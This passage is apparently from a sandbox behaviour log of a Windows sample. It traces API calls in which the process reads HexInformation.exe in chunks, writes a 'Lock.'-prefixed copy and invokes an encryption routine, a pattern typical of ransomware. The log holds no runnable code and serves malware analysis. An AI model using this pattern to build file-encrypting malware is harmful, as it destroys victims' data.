hHeap=0x970000) returned 1 [0175.301] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/HexInformation.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hexinformation.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0175.301] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.301] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0175.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0175.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0175.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0175.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0175.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0175.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0175.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0175.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0175.302] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0175.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0175.302] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0175.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0175.302] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0175.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0175.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0175.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0175.302] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0175.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0175.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0175.302] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.HexInformation.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.hexinformation.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0175.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0175.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0175.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0175.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0175.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0175.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0175.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0175.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0175.462] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0175.462] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0175.462] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0175.462] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0175.465] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0175.465] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0175.469] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0175.470] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0175.472] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0175.474] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0175.476] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0175.478] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0175.480] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0175.482] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0175.503] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0175.604] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0175.606] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0175.607] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0175.610] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0175.612] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0175.614] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0175.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0175.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0175.625] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0175.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0175.625] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x3ef9020 [0175.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3de0020 | out: hHeap=0x970000) returned 1 [0175.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0175.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0175.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0175.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0175.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0175.832] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0175.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0175.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0175.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x3deb020 [0175.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3ef9020 | out: hHeap=0x970000) returned 1 [0175.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0175.924] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0175.924] TranslateMessage (lpMsg=0x8cf708) returned 0 [0175.924] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0175.924] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0175.924] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0175.924] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0175.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0175.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0175.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0175.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0175.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0175.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x3efc020 [0175.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0175.984] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3efc020 | out: hHeap=0x970000) returned 1 [0175.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0175.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0175.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0175.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0175.990] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0175.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0175.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0175.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0175.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0175.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0175.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0175.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0175.990] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0175.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0175.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0175.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0175.990] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0175.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd88 | out: hHeap=0x970000) returned 1 [0175.990] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0175.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0175.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0175.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0175.990] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0175.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0175.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0175.991] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x3efc020 [0176.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0176.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bf8 [0176.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0176.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0176.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0176.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d08 [0176.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0176.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0176.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0176.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b58 [0176.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0176.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0176.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0176.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0176.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0176.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0176.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0176.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0176.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0176.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x4007020 [0176.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0176.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0176.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0176.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0176.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0176.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0176.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0176.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0176.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0176.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0176.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0176.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0176.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0176.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0176.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0176.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0176.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0176.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0176.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0176.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0176.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0176.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0176.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0176.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0176.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0176.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0176.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0176.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0176.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0176.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0176.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0176.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0176.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0176.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0176.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0176.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0176.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0176.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0176.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0176.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0176.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0176.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0176.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0176.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0176.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0176.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0176.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0176.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0176.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0176.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0176.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0176.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0176.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0176.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0176.073] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0176.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0176.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0176.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0176.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0176.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0176.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0176.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0176.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0176.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0176.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0176.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0176.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0176.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0176.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0176.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0176.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0176.074] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0176.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0176.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0176.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0176.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0176.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0176.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0176.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0176.074] 